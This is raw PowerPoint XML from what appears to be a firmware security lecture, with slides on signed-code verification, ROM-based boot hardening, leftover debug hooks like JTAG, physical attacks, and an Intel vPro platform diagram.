        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362970026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Verification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16387" name="Picture 4" descr="C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj03961210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713" y="2362200"/>
            <a:ext cx="1081087"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C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj0396121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10810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aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MPj03961210000[1].jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:lum bright="14000" contrast="-5000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="366951" y="4572000"/>
            <a:ext cx="1080849" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:effectLst>
            <a:innerShdw blurRad="63500" dist="50800" dir="10800000">
              <a:prstClr val="black">
                <a:alpha val="50000"/>
              </a:prstClr>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3505200"/>
            <a:ext cx="1981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63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97520">
            <a:off x="1978025" y="2990850"/>
            <a:ext cx="15081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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="5029200"/>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Digital Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Plus 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="365760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4" name="TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="510540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Publisher’s Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163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191000"/>
            <a:ext cx="70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4648200" y="1752600"/>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Verified Executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16397" name="Picture 3" descr="C:\Documents and Settings\aeldar\Local Settings\Temporary Internet Files\Content.IE5\HH0DR67K\MCj0311328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4800" y="2895600"/>
            <a:ext cx="10064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ight Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="3352800"/>
            <a:ext cx="1371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9" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="4191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Execute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2566341444"/>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Hardening Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Public Key and Verification Code placed in ROM – Can’t be Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signed Code and Digital signature placed in NVRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Systems boot from ROM code, verifies Flash code and loads it upon success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does not cover code injection via other mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11097760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Debug hooks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since it is so difficult to debug firmware, developers often leave debug hooks in final design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Debug hooks include may include support of a debug port (such as JTAG) or debug logging </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This may include sensitive information or provide a way for code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One option is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>fuses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to disable debug capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18695974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Physical attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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t>A category of attacks that require physical access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are they worth protecting from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Beware of BORE attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(Break Once, Run Everywhere)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Physical data at risk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data on external flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data going over external buses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can encrypt risky data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392194517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Intel® </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vPro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148215620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3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="685800"/>
            <a:ext cx="7162800" cy="5253038"/>
            <a:chOff x="1238250" y="1274015"/>
            <a:chExt cx="7643813" cy="4347571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5123" name="Line 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4629150" y="2763838"/>
              <a:ext cx="0" cy="1419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4" name="Line 54"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2720975" y="4721225"/>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5" name="Line 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5321300" y="5246770"/>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8" name="AutoShape 52"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3423649" y="3712544"/>
              <a:ext cx="2412409" cy="1786853"/>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defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5127" name="Line 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="2927350"/>
              <a:ext cx="21669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8" name="Line 50"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2720975" y="2347913"/>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9" name="AutoShape 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3497263" y="4023677"/>
              <a:ext cx="1338262" cy="536575"/>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12" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560872" y="4106702"/>
              <a:ext cx="1218063" cy="36919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Display</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5131"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700" y="1274015"/>
              <a:ext cx="2682874" cy="220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9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3413484" y="1492116"/>
              <a:ext cx="2361586" cy="62671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Processor</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3449061" y="3532545"/>
              <a:ext cx="2364974" cy="626712"/>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PCH</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5134" name="Picture 56" descr="RAM-Chip-Thin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788" y="2201863"/>
              <a:ext cx="1058862"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59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="6177247" y="2513299"/>
              <a:ext cx="1450504" cy="76404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DDR3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5136" name="AutoShape 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4979988" y="3985578"/>
              <a:ext cx="730251" cy="614362"/>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19" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5036439" y="4060718"/>
              <a:ext cx="655620" cy="423064"/>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I/O</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5138" name="AutoShape 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="1914525"/>
              <a:ext cx="1136650" cy="876300"/>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1" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1792224" y="2042625"/>
              <a:ext cx="1057123" cy="622771"/>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PEG</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5140" name="AutoShape 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3998913" y="2746375"/>
              <a:ext cx="1190625" cy="336550"/>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3" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4064021" y="2796782"/>
              <a:ext cx="1084229" cy="22992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IMC</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5142" name="AutoShape 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1238250" y="4284663"/>
              <a:ext cx="1524000" cy="874712"/>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5" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1312791" y="4408891"/>
              <a:ext cx="1375615" cy="62671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Display</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5144" name="Group 72"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3678141" y="4712798"/>
              <a:ext cx="1974947" cy="671512"/>
              <a:chOff x="878" y="2312"/>
              <a:chExt cx="1297" cy="410"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5155" name="AutoShape 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="878" y="2312"/>
                <a:ext cx="1297" cy="410"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 13681"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:soli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42" name="Rectangle 59"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="931" y="2380"/>
                <a:ext cx="1213" cy="249"/>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Manageability  Engine </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5145" name="Group 92"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6565900" y="4994525"/>
              <a:ext cx="1135063" cy="627061"/>
              <a:chOff x="563563" y="5080311"/>
              <a:chExt cx="612775" cy="412205"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5153" name="AutoShape 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563563" y="5163216"/>
                <a:ext cx="612775" cy="263525"/>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40" name="Rectangle 59"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="573795" y="5080540"/>
                <a:ext cx="569784" cy="41197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Flash </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                  <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5146" name="AutoShape 80"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3902075" y="2011363"/>
              <a:ext cx="1385888" cy="665162"/>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5147" name="AutoShape 81"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4002088" y="2074863"/>
              <a:ext cx="1184275" cy="538162"/>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31" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3967458" y="2134595"/>
              <a:ext cx="1258721" cy="419122"/>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GPU</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5149" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5662613" y="4775200"/>
              <a:ext cx="13525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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5150" name="Group 93"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6529388" y="4419600"/>
              <a:ext cx="2352675" cy="758825"/>
              <a:chOff x="563563" y="5201028"/>
              <a:chExt cx="612775" cy="413239"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5151" name="AutoShape 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563563" y="5284788"/>
                <a:ext cx="612775" cy="263525"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 59"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="572714" y="5200920"/>
                <a:ext cx="570971" cy="413559"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Neo Sans Intel Medium" pitchFamily="34" charset="0"/>
                    <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>LAN/WLAN</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398379018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DE38AB5C-FAEF-4F83-A7C2-F3778E7E0205}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>346</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="+mn-cs"/>
